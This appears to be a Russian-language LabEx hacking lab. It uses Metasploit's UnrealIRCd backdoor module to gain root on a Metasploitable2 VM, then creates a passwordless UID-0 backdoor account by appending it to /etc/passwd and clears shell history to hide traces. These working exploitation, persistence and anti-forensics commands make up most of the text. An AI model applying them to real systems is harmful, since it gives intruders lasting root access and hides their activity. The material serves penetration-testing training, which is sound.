Создание бэкдора и очистка следов на целевой машине в Nmap

КибербезопасностьBeginner
Практиковаться сейчас

Введение

В этой лабораторной работе мы научимся создавать бэкдор и очищать следы после успешного получения доступа к целевой машине в ходе атаки. Сценарий развернут в среде LabEx, где мы будем использовать терминал Kali для эксплуатации уязвимостей на целевой машине Metasploitable2, получения root-доступа, создания бэкдора для будущего доступа и удаления всех следов, оставленных в процессе атаки.

Получение root-доступа к целевой машине

На этом этапе мы воспользуемся уязвимостью Unreal Ircd для получения root-доступа к целевой машине.

Теперь вы запустите машину для атаки (контейнер Kali Linux) и целевую машину (виртуальную машину Metasploitable2) для эксперимента.

Откройте терминал xfce на хост-машине LabEx и запустите целевую машину Metasploitable2, выполнив следующую команду:

sudo virsh start Metasploitable2

Дождитесь запуска целевой машины, это может занять 1-3 минуты.

Проверьте соединение с целевой машиной с помощью команды ping:

ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить ping.

Запустите контейнер Kali Linux и войдите в среду bash, выполнив:

docker run -ti --network host b5b709a49cd5 bash

Внутри контейнера Kali проверьте сетевое соединение с целевой машиной:

ping 192.168.122.102

Нажмите Ctrl+C, чтобы остановить ping.

Теперь машина для атаки и целевая машина запущены, и вы можете начать тестирование на проникновение.

Примечание: Если вы случайно выйдете из текущего bash, контейнер Kali автоматически остановится. Вы можете снова выполнить docker run -ti --network host b5b709a49cd5 bash на хосте, чтобы запустить новый контейнер Kali и войти в bash для продолжения эксперимента.

В контейнере Kali Linux введите следующие команды в терминале bash:

service postgresql start
msfdb init
cd ~
msfconsole

Это запустит службу базы данных PostgreSQL, инициализирует базу данных и откроет консоль Metasploit Framework (msfconsole) для дальнейших операций.

Найдите модуль уязвимости Unreal Ircd:

search unreal_ircd

Используйте модуль unix/irc/unreal_ircd_3281_backdoor:

use exploit/unix/irc/unreal_ircd_3281_backdoor

Установите IP-адрес цели:

set RHOST 192.168.122.102

Выберите полезную нагрузку (payload) bind shell для этого модуля:

set PAYLOAD cmd/unix/bind_perl

Проэксплуатируйте уязвимость, чтобы получить доступ:

exploit

Проверьте текущего пользователя:

whoami

Вы должны увидеть, что получили root-доступ к целевой машине.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, затем начните проверку

Создание бэкдора

На этом этапе, получив root-доступ, давайте создадим бэкдор для будущего доступа к целевой машине.

Прежде всего, если вы не находитесь в консоли Metasploit, запустите её:

cd ~
msfconsole

Затем проверьте информацию о системе:

uname -a

Найдите расположение bash пользователя root:

cat /etc/passwd

Создайте учетную запись бэкдора без пароля:

echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd

Проверьте создание учетной записи бэкдора:

cat /etc/passwd

Вы должны увидеть новую учетную запись shiyanlou1234 в выводе.

Откройте новый терминал и подключитесь к целевой машине, используя учетную запись бэкдора:

telnet 192.168.122.102

Введите имя пользователя shiyanlou1234 при появлении запроса.

Проверьте текущего пользователя:

whoami

Вы должны увидеть, что вошли в систему как пользователь бэкдора.

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, затем начните проверку

Очистка следов

На этом этапе, после получения доступа и создания бэкдора, важно очистить все следы, оставленные в процессе атаки, чтобы избежать обнаружения.

Прежде всего, если вы не находитесь в консоли Metasploit, запустите её:

cd ~
msfconsole

Один из распространенных способов очистки следов — удаление истории команд. История хранится в файле .bash_history. Вы можете очистить историю с помощью следующей команды:

history -c

Чтобы очистить файл .bash_history, вы можете найти его местоположение с помощью команды find:

find / -name .bash_history

Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, затем начните проверку

Резюме

В этой лабораторной работе мы узнали, как получить root-доступ к целевой машине с помощью уязвимости Unreal Ircd, создать учетную запись бэкдора для будущего доступа и очистить следы, оставленные в процессе атаки. Этот практический опыт поможет вам понять методы, используемые злоумышленниками для поддержания постоянного доступа и сокрытия своих действий после успешного проникновения.